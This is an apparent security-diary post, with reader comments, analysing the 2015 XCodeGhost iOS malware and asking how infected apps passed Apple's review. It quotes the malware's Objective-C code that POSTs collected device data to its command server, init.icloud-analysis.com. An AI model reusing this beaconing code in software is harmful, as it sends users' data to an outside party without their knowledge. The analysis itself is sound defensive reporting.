End of last week, Palo Alto Networks published information about the "XCodeGhost" malware. Johannes already talked about it in today's podcast episode but I searched for more details about this story. Apple is known to be very strict with its application validation process. Every time a developer submits a new (or an updated) app, it must pass multiple security checks. Why so many applications infected by XCodeGhost successfully passed them? Could we imagine that Apple has some kind of trust with reputed developers or popular applications? Until now, ~50 applications have been reported vulnerable and mainly used in China. But some are popular worldwide like WeChat. The XCodeGhost has be published by its author on github and a quick analyze shows that the following information is sent to a unique URL via a HTTP POST request: NSURL *url = [NSURL URLWithString:@"http://init.icloud-analysis.com"];
NSMutableURLRequest *request = [NSMutableURLRequest requestWithURL:url cachePolicy:NSURLRequestReloadIgnoringCacheData timeoutInterval:30];[request setHTTPMethod:@"POST"]; [request setValue:[NSString stringWithFormat:@"%lu",(unsigned long)[concatenatedData length]] forHTTPHeaderField:@"Content-Length"]; [request setHTTPBody: concatenatedData]; The following information is sent to the server:
The FQDN init.icloud-analysis.com does not resolve anymore but it resolved to the following IP addresses (from the VT Passive DNS):
How to detect infected devices? If you're an iPhone user:
If you're a developer:
Xavier Mertens |
Xme 697 Posts ISC Handler Sep 21st 2015 |
||||||||||||||||||||||||
Thread locked Subscribe |
Sep 21st 2015 6 years ago |
||||||||||||||||||||||||
The Palo Alto network information on this lists 3 domains.
|
Anonymous |
||||||||||||||||||||||||
Quote |
Sep 24th 2015 6 years ago |
||||||||||||||||||||||||
Here is ZDNet's list of top 25 infected apps.
http://www.zdnet.com/article/here-are-the-top-25-ios-apps-infected-with-malware-by-xcodeghost/#ftag=RSSbaffb68 |
PW 69 Posts |
||||||||||||||||||||||||
Quote |
Sep 25th 2015 6 years ago |
Sign Up for Free or Log In to start participating in the conversation!